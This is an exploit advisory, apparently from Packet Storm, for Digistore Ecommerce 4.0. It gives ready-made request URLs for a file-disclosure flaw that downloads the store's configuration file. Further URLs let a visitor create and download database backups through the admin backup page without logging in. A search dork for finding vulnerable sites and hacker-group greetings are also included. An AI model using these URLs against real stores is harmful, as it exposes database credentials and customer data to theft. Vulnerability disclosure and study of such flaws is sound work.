Digistore Ecommerce version 4.0 suffers from backup disclosure and file disclosure vulnerabilities.
8ffe82af13ff66c7e69413fbc4080453a3e7eb78c1f775cf01ee6d9cd92cc722====================================================
Digistore Ecommerce V4.0 (File Disclosure) Vulnerabilities
Digistore Ecommerce V4.0 by Pass / Creat and Download Backup Vulnerability
====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ####################################### 1
0 I'm indoushka member from Inj3ct0r Team 1
1 ####################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
########################################################################
# Vendor: http://www.digistore.co.nz/
# Date: 2010-05-27
# Author : indoushka
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact : indoushka@hotmail.com
# Home : www.alkrsan.net
# Dork : Powered by Digistore, Open source e-commerce
# Bug : File Disclosure
# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0)
########################################################################
# Exploit By indoushka
# File Disclosure :
in : admin/file_manager.php/login.php?action=download&filename=
Exploit : admin/file_manager.php/login_admin.php/login.php?action=download&filename=/includes/_includes_configure.php
Example : http://[site]/[path]/admin/file_manager.php/login_admin.php/login.php?action=download&filename=/includes/_includes_configure.php
# Backup :
http://127.0.0.1/Digistore/admin/backup/login.php?action=backupnow
http://127.0.0.1/Digistore/admin/backup/login.php?action=backup
to download buckup : http://127.0.0.1/Digistore/admin/backup/login.php?action=download&file=db_comm-20100301222138.sql
db_comm-20100301222138.sql chang it to the name of the backup and you cant download it with IE i download it with opera 10.10 + Mozilla Firefox
Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH
---------------------------------------------------------------------------------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed